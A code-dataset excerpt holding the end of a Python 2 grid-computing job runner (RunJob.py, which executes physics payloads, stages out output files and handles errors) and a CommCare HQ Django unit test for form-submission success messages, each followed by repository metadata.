job.stdout _stderr = job.stderr # loop over all run commands (only >1 for multi-trfs) current_job_number = 0 getstatusoutput_was_interrupted = False number_of_jobs = len(runCommandList) for cmd in runCommandList: current_job_number += 1 # create the stdout/err files if multi_trf: job.stdout = _stdout.replace(".txt", "_%d.txt" % (current_job_number)) job.stderr = _stderr.replace(".txt", "_%d.txt" % (current_job_number)) file_stdout, file_stderr = self.getStdoutStderrFileObjects(stdoutName=job.stdout, stderrName=job.stderr) if not (file_stdout and file_stderr): res_tuple = (1, "Could not open stdout/stderr files, piping not possible") tolog("!!WARNING!!2222!! %s" % (res_tuple[1])) break try: # add the full job command to the job_setup.sh file to_script = cmd.replace(";", ";\n") thisExperiment.updateJobSetupScript(job.workdir, to_script=to_script) tolog("Executing job command %d/%d" % (current_job_number, number_of_jobs)) # Start the subprocess main_subprocess = self.getSubprocess(thisExperiment, cmd, stdout=file_stdout, stderr=file_stderr) if main_subprocess: time.sleep(2) try: tolog("Process id of job command: %d" % (main_subprocess.pid)) except Exception, e: tolog("1. Exception caught: %s" % (e)) # Start the memory utility if required mem_subprocess = None if thisExperiment.shouldExecuteMemoryMonitor(): summary = thisExperiment.getMemoryMonitorJSONFilename() mem_cmd = self.getMemoryUtilityCommand(main_subprocess.pid, summary=summary) if mem_cmd != "": mem_subprocess = self.getSubprocess(thisExperiment, mem_cmd) if mem_subprocess: try: tolog("Process id of memory monitor: %d" % (mem_subprocess.pid)) except Exception, e: tolog("3. Exception caught: %s" % (e)) else: tolog("Could not launch memory monitor since the command path does not exist") else: tolog("Not required to run memory monitor") # Loop until the main subprocess has finished while main_subprocess.poll() is None: # .. # Take a short nap time.sleep(1) # Stop the memory monitor if mem_subprocess: mem_subprocess.send_signal(signal.SIGUSR1) tolog("Terminated the memory monitor subprocess") # Move the output JSON to the pilots init dir try: copy2("%s/*.json" % (job.workdir), "%s/." % (self.__pworkdir)) except Exception, e: tolog("!!WARNING!!2222!! Caught exception while trying to copy JSON files: %s" % (e)) # Handle main subprocess errors try: stdout = open(job.stdout, 'r') res_tuple = (main_subprocess.returncode, tail(stdout)) except Exception, e: tolog("!!WARNING!!3002!! Failed during tail operation: %s" % (e)) else: tolog("Tail:\n%s" % (res_tuple[1])) stdout.close() else: res_tuple = (1, "Popen ended prematurely (payload command failed to execute, see stdout/err)") tolog("!!WARNING!!3001!! %s" % (res_tuple[1])) except Exception, e: tolog("!!FAILED!!3000!! Failed to run command: %s" % str(e)) getstatusoutput_was_interrupted = True if self.__failureCode: job.result[2] = self.__failureCode tolog("!!FAILED!!3000!! Failure code: %d" % (self.__failureCode)) break else: if res_tuple[0] == 0: tolog("Job command %d/%d finished" % (current_job_number, number_of_jobs)) else: tolog("Job command %d/%d failed: res = %s" % (current_job_number, number_of_jobs, str(res_tuple))) break t1 = os.times() tolog("t1 = %s" % str(t1)) t = map(lambda x, y:x-y, t1, t0) # get the time consumed job.cpuConsumptionUnit, job.cpuConsumptionTime, job.cpuConversionFactor = pUtil.setTimeConsumed(t) tolog("Job CPU usage: %s %s" % (job.cpuConsumptionTime, job.cpuConsumptionUnit)) tolog("Job CPU conversion factor: %1.10f" % (job.cpuConversionFactor)) job.timeExe = int(round(t1[4] - t0[4])) tolog("Original exit code: %d" % (res_tuple[0])) tolog("Exit code: %d (returned from OS)" % (res_tuple[0]%255)) # check the job report for any exit code that should replace the res_tuple[0] res0, exitAcronym, exitMsg = self.getTrfExitInfo(res_tuple[0], job.workdir) res = (res0, res_tuple[1], exitMsg) # dump an extract of the payload output if number_of_jobs > 1: _stdout = job.stdout _stderr = job.stderr _stdout = _stdout.replace(".txt", "_N.txt") _stderr = _stderr.replace(".txt", "_N.txt") tolog("NOTE: For %s output, see files %s, %s (N = [1, %d])" % (job.payload, _stdout, _stderr, number_of_jobs)) else: tolog("NOTE: For %s output, see files %s, %s" % (job.payload, job.stdout, job.stderr)) # JEM job-end callback try: from JEMstub import notifyJobEnd2JEM notifyJobEnd2JEM(job, tolog) except: pass # don't care (fire and forget) # restore the proxy #if hP_ret: # rP_ret = proxyguard.restoreProxy() # if not rP_ret: # tolog("Warning: Problems with storage can occur since proxy could not be restored") # else: # hP_ret = False # tolog("ProxyGuard has finished successfully") return res, job, getstatusoutput_was_interrupted, current_job_number def moveTrfMetadata(self, workdir, jobId): """ rename and copy the trf metadata """ oldMDName = "%s/metadata.xml" % (workdir) _filename = "metadata-%s.xml.PAYLOAD" % (jobId) newMDName = "%s/%s" % (workdir, _filename) try: os.rename(oldMDName, newMDName) except: tolog("Warning: Could not open the original %s file, but harmless, pass it" % (oldMDName)) pass else: tolog("Renamed %s to %s" % (oldMDName, newMDName)) # now move it to the pilot work dir try: copy2(newMDName, "%s/%s" % (self.__pworkdir, _filename)) except Exception, e: tolog("Warning: Could not copy %s to site work dir: %s" % (_filename, str(e))) else: tolog("Metadata was transferred to site work dir: %s/%s" % (self.__pworkdir, _filename)) def createFileMetadata(self, outFiles, job, outsDict, dsname, datasetDict, sitename, analysisJob=False): """ create the metadata for the output + log files """ ec = 0 # get/assign guids to the output files if outFiles: if not pUtil.isBuildJob(outFiles): ec, job.pilotErrorDiag, job.outFilesGuids = RunJobUtilities.getOutFilesGuids(job.outFiles, job.workdir) if ec: # missing PoolFileCatalog (only error code from getOutFilesGuids) return ec, job, None else: tolog("Build job - do not use PoolFileCatalog to get guid (generated)") else: tolog("This job has no output files") # get the file sizes and checksums for the local output files # WARNING: any errors are lost if occur in getOutputFileInfo() ec, pilotErrorDiag, fsize, checksum = pUtil.getOutputFileInfo(list(outFiles), getChecksumCommand(), skiplog=True, logFile=job.logFile) if ec != 0: tolog("!!FAILED!!2999!! %s" % (pilotErrorDiag)) self.failJob(job.result[1], ec, job, pilotErrorDiag=pilotErrorDiag) if self.__logguid: guid = self.__logguid else: guid = job.tarFileGuid # create preliminary metadata (no metadata yet about log file - added later in pilot.py) _fname = "%s/metadata-%s.xml" % (job.workdir, job.jobId) try: _status = pUtil.PFCxml(job.experiment, _fname, list(job.outFiles), fguids=job.outFilesGuids, fntag="lfn", alog=job.logFile, alogguid=guid,\ fsize=fsize, checksum=checksum, analJob=analysisJob) except Exception, e: pilotErrorDiag = "PFCxml failed due to problematic XML: %s" % (e) tolog("!!WARNING!!1113!! %s" % (pilotErrorDiag)) self.failJob(job.result[1], error.ERR_MISSINGGUID, job, pilotErrorDiag=pilotErrorDiag) else: if not _status: pilotErrorDiag = "Missing guid(s) for output file(s) in metadata" tolog("!!FAILED!!2999!! %s" % (pilotErrorDiag)) self.failJob(job.result[1], error.ERR_MISSINGGUID, job, pilotErrorDiag=pilotErrorDiag) tolog("..............................................................................................................") tolog("Created %s with:" % (_fname)) tolog(".. log : %s (to be transferred)" % (job.logFile)) tolog(".. log guid : %s" % (guid)) tolog(".. out files : %s" % str(job.outFiles)) tolog(".. out file guids : %s" % str(job.outFilesGuids)) tolog(".. fsize : %s" % str(fsize)) tolog(".. checksum : %s" % str(checksum)) tolog("..............................................................................................................") # convert the preliminary metadata-<jobId>.xml file to OutputFiles-<jobId>.xml for NG and for CERNVM # note: for CERNVM this is only really needed when CoPilot is used if os.environ.has_key('Nordugrid_pilot') or sitename == 'CERNVM': if RunJobUtilities.convertMetadata4NG(os.path.join(job.workdir, job.outputFilesXML), _fname, outsDict, dsname, datasetDict): tolog("Metadata has been converted to NG/CERNVM format") else: job.pilotErrorDiag = "Could not convert metadata to NG/CERNVM format" tolog("!!WARNING!!1999!! %s" % (job.pilotErrorDiag)) # try to build a file size and checksum dictionary for the output files # outputFileInfo: {'a.dat': (fsize, checksum), ...} # e.g.: file size for file a.dat: outputFileInfo['a.dat'][0] # checksum for file a.dat: outputFileInfo['a.dat'][1] try: # remove the log entries _fsize = fsize[1:] _checksum = checksum[1:] outputFileInfo = dict(zip(job.outFiles, zip(_fsize, _checksum))) except Exception, e: tolog("!!WARNING!!2993!! Could not create output file info dictionary: %s" % str(e)) outputFileInfo = {} else: tolog("Output file info dictionary created: %s" % str(outputFileInfo)) return ec, job, outputFileInfo def getDatasets(self, job): """ get the datasets for the output files """ # get the default dataset if job.destinationDblock and job.destinationDblock[0] != 'NULL' and job.destinationDblock[0] != ' ': dsname = job.destinationDblock[0] else: dsname = "%s-%s-%s" % (time.localtime()[0:3]) # pass it a random name # create the dataset dictionary # (if None, the dsname above will be used for all output files) datasetDict = getDatasetDict(job.outFiles, job.destinationDblock, job.logFile, job.logDblock) if datasetDict: tolog("Dataset dictionary has been verified") else: tolog("Dataset dictionary could not be verified, output files will go to: %s" % (dsname)) return dsname, datasetDict def stageOut(self, job, jobSite, outs, analysisJob, dsname, datasetDict, outputFileInfo): """ perform the stage-out """ error = PilotErrors() pilotErrorDiag = "" rc = 0 latereg = False rf = None # generate the xml for the output files and the site mover pfnFile = "OutPutFileCatalog.xml" try: _status = pUtil.PFCxml(job.experiment, pfnFile, outs, fguids=job.outFilesGuids, fntag="pfn") except Exception, e: job.pilotErrorDiag = "PFCxml failed due to problematic XML: %s" % (e) tolog("!!WARNING!!1113!! %s" % (job.pilotErrorDiag)) return error.ERR_MISSINGGUID, job, rf, latereg else: if not _status: job.pilotErrorDiag = "Metadata contains missing guid(s) for output file(s)" tolog("!!WARNING!!2999!! %s" % (job.pilotErrorDiag)) return error.ERR_MISSINGGUID, job, rf, latereg tolog("Using the newly-generated %s/%s for put operation" % (job.workdir, pfnFile)) # the cmtconfig is needed by at least the xrdcp site mover cmtconfig = getCmtconfig(job.cmtconfig) rs = "" # return string from put_data with filename in case of transfer error tin_0 = os.times() try: rc, job.pilotErrorDiag, rf, rs, job.filesNormalStageOut, job.filesAltStageOut = mover.mover_put_data("xmlcatalog_file:%s" % (pfnFile), dsname, jobSite.sitename,\ ub=jobSite.dq2url, analysisJob=analysisJob, pinitdir=self.__pilot_initdir, scopeOut=job.scopeOut,\ proxycheck=self.__proxycheckFlag, spsetup=job.spsetup, token=job.destinationDBlockToken,\ userid=job.prodUserID, datasetDict=datasetDict, prodSourceLabel=job.prodSourceLabel,\ outputDir=self.__outputDir, jobId=job.jobId, jobWorkDir=job.workdir, DN=job.prodUserID,\ dispatchDBlockTokenForOut=job.dispatchDBlockTokenForOut, outputFileInfo=outputFileInfo,\ lfcreg=self.__fileCatalogRegistration, jobDefId=job.jobDefinitionID, jobCloud=job.cloud, logFile=job.logFile,\ stageoutTries=self.__stageoutretry, cmtconfig=cmtconfig, experiment=self.__experiment, fileDestinationSE=job.fileDestinationSE) tin_1 = os.times() job.timeStageOut = int(round(tin_1[4] - tin_0[4])) except Exception, e: tin_1 = os.times() job.timeStageOut = int(round(tin_1[4] - tin_0[4])) if 'format_exc' in traceback.__all__: trace = traceback.format_exc() pilotErrorDiag = "Put function can not be called for staging out: %s, %s" % (str(e), trace) else: tolog("traceback.format_exc() not available in this python version") pilotErrorDiag = "Put function can not be called for staging out: %s" % (str(e)) tolog("!!WARNING!!3000!! %s" % (pilotErrorDiag)) rc = error.ERR_PUTFUNCNOCALL job.setState(["holding", job.result[1], rc]) else: if job.pilotErrorDiag != "": if job.pilotErrorDiag.startswith("Put error:"): pre = "" else: pre = "Put error: " job.pilotErrorDiag = pre + tailPilotErrorDiag(job.pilotErrorDiag, size=256-len("pilot: Put error: ")) tolog("Put function returned code: %d" % (rc)) if rc != 0: # remove any trailing "\r" or "\n" (there can be two of them) if rs != None: rs = rs.rstrip() tolog("Error string: %s" % (rs)) # is the job recoverable? if error.isRecoverableErrorCode(rc): _state = "holding" _msg = "WARNING" else: _state = "failed" _msg = "FAILED" # look for special error in the error string if rs == "Error: string Limit exceeded 250": tolog("!!%s!!3000!! Put error: file name string limit exceeded 250" % (_msg)) job.setState([_state, job.result[1], error.ERR_LRCREGSTRSIZE]) else: job.setState([_state, job.result[1], rc]) tolog("!!%s!!1212!! %s" % (_msg, error.getErrorStr(rc))) else: # set preliminary finished (may be overwritten below in the LRC registration) job.setState(["finished", 0, 0]) # create a weak lockfile meaning that file transfer worked # (useful for job recovery if activated) in the job workdir createLockFile(True, jobSite.workdir, lockfile="ALLFILESTRANSFERRED") # create another lockfile in the site workdir since a transfer failure can still occur during the log transfer # and a later recovery attempt will fail (job workdir will not exist at that time) createLockFile(True, self.__pworkdir, lockfile="ALLFILESTRANSFERRED") if job.result[0] == "holding" and '(unrecoverable)' in job.pilotErrorDiag: job.result[0] = "failed" tolog("!!WARNING!!2999!! HOLDING state changed to FAILED since error is unrecoverable") return rc, job, rf, latereg def copyInputForFiles(self, workdir): """ """ try: cmd = "cp %s/inputFor_* %s" % (self.__pilot_initdir, workdir) tolog("Executing command: %s" % (cmd)) out = commands.getoutput(cmd) except IOError, e: pass tolog(out) def getStdoutStderrFileObjects(self, stdoutName="stdout.txt", stderrName="stderr.txt"): """ Create stdout/err file objects """ try: stdout = open(os.path.join(os.getcwd(), stdoutName), "w") stderr = open(os.path.join(os.getcwd(), stderrName), "w") except Exception, e: tolog("!!WARNING!!3330!! Failed to open stdout/err files: %s" % (e)) stdout = None stderr = None return stdout, stderr def getSubprocess(self, thisExperiment, runCommand, stdout=None, stderr=None): """ Execute a command as a subprocess """ # Execute and return the subprocess object return thisExperiment.getSubprocess(runCommand, stdout=stdout, stderr=stderr) # Methods used by event service RunJob* modules .............................................................. def stripSetupCommand(self, cmd, trfName): """ Remove the trf part of the setup command """ location = cmd.find(trfName) return cmd[:location] def executeMakeRunEventCollectionScript(self, cmd, eventcollection_filename): """ Define and execute the event collection script """ cmd += "get_files -jo %s" % (eventcollection_filename) tolog("Execute command: %s" % (cmd)) # WARNING: PUT A TIMER AROUND THIS COMMAND rc, rs = commands.getstatusoutput(cmd) return rc, rs def prependMakeRunEventCollectionScript(self, input_file, output_file, eventcollection_filename): """ Prepend the event collection script """ status = False eventcollection_filename_mod = "" with open(eventcollection_filename) as f1: eventcollection_filename_mod = eventcollection_filename.replace(".py",".2.py") with open(eventcollection_filename_mod, "w") as f2: f2.write("EvtMax = -1\n") f2.write("In = [ \'%s\' ]\n" % (input_file)) f2.write("Out = \'%s\'\n" % (output_file)) for line in f1: f2.write(line) f2.close() f1.close() status = True return status, eventcollection_filename_mod def executeTAGFileCommand(self, cmd, eventcollection_filename_mod): """ Execute the TAG file creation script using athena """ cmd += "athena.py %s >MakeRunEventCollection-stdout.txt" % (eventcollection_filename_mod) tolog("Executing command: %s" % (cmd)) # WARNING: PUT A TIMER AROUND THIS COMMAND rc, rs = commands.getstatusoutput(cmd) return rc, rs def swapAthenaProcNumber(self, swap_value): """ Swap the current ATHENA_PROC_NUMBER so that it does not upset the job """ # Note: only needed during TAG file creation athena_proc_number = 0 try: athena_proc_number = int(os.environ['ATHENA_PROC_NUMBER']) except Exception, e: tolog("ATHENA_PROC_NUMBER not defined, setting it to: %s" % (swap_value)) os.environ['ATHENA_PROC_NUMBER'] = str(swap_value) else: if swap_value == 0: del os.environ['ATHENA_PROC_NUMBER'] tolog("Unset ATHENA_PROC_NUMBER") else: os.environ['ATHENA_PROC_NUMBER'] = str(swap_value) tolog("ATHENA_PROC_NUMBER swapped from \'%d\' to \'%d\'" % (athena_proc_number, swap_value)) return athena_proc_number def createTAGFile(self, jobExecutionCommand, trfName, inFiles, eventcollection_filename): """ Create a TAG file """ tag_file = "" tag_file_guid = getGUID() # We cannot have ATHENA_PROC_NUMBER set to a value larger than 1, since that will # activate AthenaMP. Reset it for now, and swap it back at the end of this method athena_proc_number = self.swapAthenaProcNumber(0) # Remove everything after the trf command from the job execution command cmd = self.stripSetupCommand(jobExecutionCommand, trfName) tolog("Stripped command: %s" % (cmd)) # Define and execute the event collection script if cmd != "": rc, rs = self.executeMakeRunEventCollectionScript(cmd, eventcollection_filename) # Prepend the event collection script if rc == 0: input_file = inFiles[0] tag_file = input_file + ".TAG" status, eventcollection_filename_mod = self.prependMakeRunEventCollectionScript(input_file, tag_file, eventcollection_filename) # Finally create the TAG file if status: rc, rs = self.executeTAGFileCommand(cmd, eventcollection_filename_mod) if rc != 0: tolog("!!WARNING!!3337!! Failed to create TAG file: rc=%d, rs=%s" % (rc, rs)) tag_file = "" else: tolog("!!WARNING!!3339!! Failed to download %s: rc=%d, rs=%s " % (eventcollection_filename, rc, rs)) else: tolog("!!WARNING!!3330!! Failed to strip the job execution command, cannot create TAG file") # Now swap the ATHENA_PROC_NUMBER since it is needed for activating AthenaMP dummy = self.swapAthenaProcNumber(athena_proc_number) return tag_file, tag_file_guid # (end event service methods) ................................................................................ # main process starts here if __name__ == "__main__": # Get error handler error = PilotErrors() # Get runJob object runJob = RunJob() # Define a new parent group os.setpgrp() # Protect the runJob code with exception handling hP_ret = False try: # always use this filename as the new jobDef module name import newJobDef jobSite = Site.Site() return_tuple = runJob.argumentParser() tolog("argumentParser returned: %s" % str(return_tuple)) jobSite.setSiteInfo(return_tuple) # jobSite.setSiteInfo(argParser(sys.argv[1:])) # reassign workdir for this job jobSite.workdir = jobSite.wntmpdir if runJob.getPilotLogFilename() != "": pUtil.setPilotlogFilename(runJob.getPilotLogFilename()) # set node info node = Node.Node() node.setNodeName(os.uname()[1]) node.collectWNInfo(jobSite.workdir) # redirect stder sys.stderr = open("%s/runjob.stderr" % (jobSite.workdir), "w") tolog("Current job workdir is: %s" % os.getcwd()) tolog("Site workdir is: %s" % jobSite.workdir) # get the experiment object thisExperiment = getExperiment(runJob.getExperiment()) tolog("RunJob will serve experiment: %s" % (thisExperiment.getExperiment())) # set the cache (used e.g. by LSST) if runJob.getCache(): thisExperiment.setCache(runJob.getCache()) JR = JobRecovery() try: job = Job.Job() job.workdir = jobSite.workdir job.setJobDef(newJobDef.job) job.workdir = jobSite.workdir job.experiment = runJob.getExperiment() # figure out and set payload file names job.setPayloadName(thisExperiment.getPayloadName(job)) except Exception, e: pilotErrorDiag = "Failed to process job info: %s" % str(e) tolog("!!WARNING!!3000!! %s" % (pilotErrorDiag)) runJob.failJob(0, error.ERR_UNKNOWN, job, pilotErrorDiag=pilotErrorDiag) # prepare for the output file data directory # (will only created for jobs that end up in a 'holding' state) job.datadir = runJob.getParentWorkDir() + "/PandaJob_%s_data" % (job.jobId) # register cleanup function atexit.register(runJob.cleanup, job) # to trigger an exception so that the SIGTERM signal can trigger cleanup function to run # because by default signal terminates process without cleanup. def sig2exc(sig, frm): """ signal handler """ error = PilotErrors() runJob.setGlobalPilotErrorDiag("!!FAILED!!3000!! SIGTERM Signal %s is caught in child pid=%d!\n" % (sig, os.getpid())) tolog(runJob.getGlobalPilotErrorDiag()) if sig == signal.SIGTERM: runJob.setGlobalErrorCode(error.ERR_SIGTERM) elif sig == signal.SIGQUIT: runJob.setGlobalErrorCode(error.ERR_SIGQUIT) elif sig == signal.SIGSEGV: runJob.setGlobalErrorCode(error.ERR_SIGSEGV) elif sig == signal.SIGXCPU: runJob.setGlobalErrorCode(error.ERR_SIGXCPU) elif sig == signal.SIGBUS: runJob.setGlobalErrorCode(error.ERR_SIGBUS) elif sig == signal.SIGUSR1: runJob.setGlobalErrorCode(error.ERR_SIGUSR1) else: runJob.setGlobalErrorCode(error.ERR_KILLSIGNAL) runJob.setFailureCode(runJob.getGlobalErrorCode()) # print to stderr print >> sys.stderr, runJob.getGlobalPilotErrorDiag() raise SystemError(sig) signal.signal(signal.SIGTERM, sig2exc) signal.signal(signal.SIGQUIT, sig2exc) signal.signal(signal.SIGSEGV, sig2exc) signal.signal(signal.SIGXCPU, sig2exc) signal.signal(signal.SIGUSR1, sig2exc) signal.signal(signal.SIGBUS, sig2exc) # see if it's an analysis job or not analysisJob = isAnalysisJob(job.trf.split(",")[0]) if analysisJob: tolog("User analysis job") else: tolog("Production job") tolog("runJob received a job with prodSourceLabel=%s" % (job.prodSourceLabel)) # setup starts here ................................................................................ # update the job state file job.jobState = "setup" _retjs = JR.updateJobStateTest(job, jobSite, node, mode="test") # send [especially] the process group back to the pilot job.setState([job.jobState, 0, 0]) rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort()) # prepare the setup and get the run command list ec, runCommandList, job, multi_trf = runJob.setup(job, jobSite, thisExperiment) if ec != 0: tolog("!!WARNING!!2999!! runJob setup failed: %s" % (job.pilotErrorDiag)) runJob.failJob(0, ec, job, pilotErrorDiag=job.pilotErrorDiag) tolog("Setup has finished successfully") # job has been updated, display it again job.displayJob() # (setup ends here) ................................................................................ tolog("Setting stage-in state until all input files have been copied") job.setState(["stagein", 0, 0]) # send the special setup string back to the pilot (needed for the log transfer on xrdcp systems) rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort()) # stage-in ......................................................................................... # update the job state file job.jobState = "stagein" _retjs = JR.updateJobStateTest(job, jobSite, node, mode="test") # update copysetup[in] for production jobs if brokerage has decided that remote I/O should be used if job.transferType == 'direct': tolog('Brokerage has set transfer type to \"%s\" (remote I/O will be attempted for input files, any special access mode will be ignored)' %\ (job.transferType)) RunJobUtilities.updateCopysetups('', transferType=job.transferType) # stage-in all input files (if necessary) job, ins, statusPFCTurl, usedFAXandDirectIO = runJob.stageIn(job, jobSite, analysisJob) if job.result[2] != 0: tolog("Failing job with ec: %d" % (ec)) runJob.failJob(0, job.result[2], job, ins=ins, pilotErrorDiag=job.pilotErrorDiag) # after stageIn, all file transfer modes are known (copy_to_scratch, file_stager, remote_io) # consult the FileState file dictionary if cmd3 should be updated (--directIn should not be set if all # remote_io modes have been changed to copy_to_scratch as can happen with ByteStream files) # and update the run command list if necessary. # in addition to the above, if FAX is used as a primary site mover and direct access is enabled, then # the run command should not contain the --oldPrefix, --newPrefix, --lfcHost options but use --usePFCTurl if job.inFiles != ['']: runCommandList = RunJobUtilities.updateRunCommandList(runCommandList, runJob.getParentWorkDir(), job.jobId, statusPFCTurl, analysisJob, usedFAXandDirectIO) # copy any present @inputFor_* files from the pilot init dir to the rundirectory (used for ES merge jobs) #runJob.copyInputForFiles(job.workdir) # (stage-in ends here) ............................................................................. # change to running state since all input files have been staged tolog("Changing to running state since all input files have been staged") job.setState(["running", 0, 0]) rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort()) # update the job state file job.jobState = "running" _retjs = JR.updateJobStateTest(job, jobSite, node, mode="test") # run the job(s) ................................................................................... # Set ATLAS_CONDDB if necessary, and other env vars RunJobUtilities.setEnvVars(jobSite.sitename) # execute the payload res, job, getstatusoutput_was_interrupted, current_job_number = runJob.executePayload(thisExperiment, runCommandList, job) # if payload leaves the input files, delete them explicitly if ins: ec = pUtil.removeFiles(job.workdir, ins) # payload error handling ed = ErrorDiagnosis() job = ed.interpretPayload(job, res, getstatusoutput_was_interrupted, current_job_number, runCommandList, runJob.getFailureCode()) if job.result[1] != 0 or job.result[2] != 0: runJob.failJob(job.result[1], job.result[2], job, pilotErrorDiag=job.pilotErrorDiag) # stage-out ........................................................................................ # update the job state file job.jobState = "stageout" _retjs = JR.updateJobStateTest(job, jobSite, node, mode="test") # verify and prepare and the output files for transfer ec, pilotErrorDiag, outs, outsDict = RunJobUtilities.prepareOutFiles(job.outFiles, job.logFile, job.workdir) if ec: # missing output file (only error code from prepareOutFiles) runJob.failJob(job.result[1], ec, job, pilotErrorDiag=pilotErrorDiag) tolog("outsDict: %s" % str(outsDict)) # update the current file states updateFileStates(outs, runJob.getParentWorkDir(), job.jobId, mode="file_state", state="created") dumpFileStates(runJob.getParentWorkDir(), job.jobId) # create xml string to pass to dispatcher for atlas jobs outputFileInfo = {} if outs or (job.logFile and job.logFile != ''): # get the datasets for the output files dsname, datasetDict = runJob.getDatasets(job) # re-create the metadata.xml file, putting guids of ALL output files into it. # output files that miss guids from the job itself will get guids in PFCxml function # first rename and copy the trf metadata file for non-build jobs if not pUtil.isBuildJob(outs): runJob.moveTrfMetadata(job.workdir, job.jobId) # create the metadata for the output + log files ec, job, outputFileInfo = runJob.createFileMetadata(list(outs), job, outsDict, dsname, datasetDict, jobSite.sitename, analysisJob=analysisJob) if ec: runJob.failJob(0, ec, job, pilotErrorDiag=job.pilotErrorDiag) # move output files from workdir to local DDM area finalUpdateDone = False if outs: tolog("Setting stage-out state until all output files have been copied") job.setState(["stageout", 0, 0]) rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort()) # stage-out output files ec, job, rf, latereg = runJob.stageOut(job, jobSite, outs, analysisJob, dsname, datasetDict, outputFileInfo) # error handling if job.result[0] == "finished" or ec == error.ERR_PUTFUNCNOCALL: rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort(), final=True) else: rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort(), final=True, latereg=latereg) if ec == error.ERR_NOSTORAGE: # update the current file states for all files since nothing could be transferred updateFileStates(outs, runJob.getParentWorkDir(), job.jobId, mode="file_state", state="not_transferred") dumpFileStates(runJob.getParentWorkDir(), job.jobId) finalUpdateDone = True if ec != 0: runJob.sysExit(job, rf) # (stage-out ends here) ....................................................................... job.setState(["finished", 0, 0]) if not finalUpdateDone: rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort(), final=True) runJob.sysExit(job) except Exception, errorMsg: error = PilotErrors() if runJob.getGlobalPilotErrorDiag() != "": pilotErrorDiag = "Exception caught in runJob: %s" % (runJob.getGlobalPilotErrorDiag()) else: pilotErrorDiag = "Exception caught in runJob: %s" % str(errorMsg) if 'format_exc' in traceback.__all__: pilotErrorDiag += ", " + traceback.format_exc() try: tolog("!!FAILED!!3001!! %s" % (pilotErrorDiag)) except Exception, e: if len(pilotErrorDiag) > 10000: pilotErrorDiag = pilotErrorDiag[:10000] tolog("!!FAILED!!3001!! Truncated (%s): %s" % (e, pilotErrorDiag)) else: pilotErrorDiag = "Exception caught in runJob: %s" % (e) tolog("!!FAILED!!3001!! %s" % (pilotErrorDiag)) # # restore the proxy if necessary # if hP_ret: # rP_ret = proxyguard.restoreProxy() # if not rP_ret: # tolog("Warning: Problems with storage can occur since proxy could not be restored") # else: # hP_ret = False # tolog("ProxyGuard has finished successfully") tolog("sys.path=%s" % str(sys.path)) cmd = "pwd;ls -lF %s;ls -lF;ls -lF .." % (runJob.getPilotInitDir()) tolog("Executing command: %s" % (cmd)) out = commands.getoutput(cmd) tolog("%s" % (out)) job = Job.Job() job.setJobDef(newJobDef.job) job.pilotErrorDiag = pilotErrorDiag job.result[0] = "failed" if runJob.getGlobalErrorCode() != 0: job.result[2] = runJob.getGlobalErrorCode() else: job.result[2] = error.ERR_RUNJOBEXC tolog("Failing job with error code: %d" % (job.result[2])) # fail the job without calling sysExit/cleanup (will be called anyway) runJob.failJob(0, job.result[2], job, pilotErrorDiag=pilotErrorDiag, docleanup=False) # end of runJob
RRCKI/pilot
RunJob.py
Python
apache-2.0
69,493
from StringIO import StringIO from django.test import TestCase from django.test.client import Client from corehq.apps.app_manager.models import Application, APP_V1, Module from corehq.apps.app_manager.success_message import SuccessMessage from corehq.apps.domain.shortcuts import create_domain from corehq.apps.users.models import CommCareUser from datetime import datetime, timedelta from dimagi.utils.parsing import json_format_datetime from receiver.xml import get_simple_response_xml, ResponseNature submission_template = """<?xml version='1.0' ?> <data xmlns="%(xmlns)s"> <meta> <username>%(username)s</username> <userID>%(userID)s</userID> </meta> </data> """ class SuccessMessageTest(TestCase): message = "Thanks $first_name ($name)! You have submitted $today forms today and $week forms since Monday." domain = "test" username = "danny" first_name = "Danny" last_name = "Roberts" password = "123" xmlns = "http://dimagi.com/does_not_matter" tz = timedelta(hours=0) def setUp(self): create_domain(self.domain) couch_user = CommCareUser.create(self.domain, self.username, self.password) userID = couch_user.user_id couch_user.first_name = self.first_name couch_user.last_name = self.last_name couch_user.save() self.sm = SuccessMessage(self.message, userID, tz=self.tz) c = Client() app = Application.new_app(self.domain, "Test App", application_version=APP_V1) app.add_module(Module.new_module("Test Module", "en")) form = app.new_form(0, "Test Form", "en") form.xmlns = self.xmlns app.success_message = {"en": self.message} app.save() def fake_form_submission(userID=userID, username=self.username, xmlns=self.xmlns, time=None): submission = submission_template % { "userID": userID, "username": username, "xmlns": xmlns } f = StringIO(submission.encode('utf-8')) f.name = "tempfile.xml" kwargs = dict(HTTP_X_SUBMIT_TIME=json_format_datetime(time)) if time else {} response = c.post("/a/{self.domain}/receiver/".format(self=self), { 'xml_submission_file': f, }, **kwargs) return response self.num_forms_today = 0 self.num_forms_this_week = 0 now = datetime.utcnow() tznow = now + self.tz week_start = tznow - timedelta(days=tznow.weekday()) week_start = datetime(week_start.year, week_start.month, week_start.day) - self.tz day_start = datetime(tznow.year, tznow.month, tznow.day) - self.tz spacing = 6 for h in xrange((24/spacing)*8): time = now-timedelta(hours=spacing*h) response = fake_form_submission(time=time) if time > week_start: self.num_forms_this_week += 1 if time > day_start: self.num_forms_today += 1 self.assertEqual( response.content, get_simple_response_xml(("Thanks {self.first_name} ({self.first_name} {self.last_name})! " "You have submitted {self.num_forms_today} forms today " "and {self.num_forms_this_week} forms since Monday.").format(self=self), nature=ResponseNature.SUBMIT_SUCCESS) ) def testRender(self): self.assertEqual( self.sm.render(), ("Thanks {self.first_name} ({self.first_name} {self.last_name})! " "You have submitted {self.num_forms_today} forms today " "and {self.num_forms_this_week} forms since Monday.").format(self=self) )
gmimano/commcaretest
corehq/apps/app_manager/tests/test_success_message.py
Python
bsd-3-clause
3,754
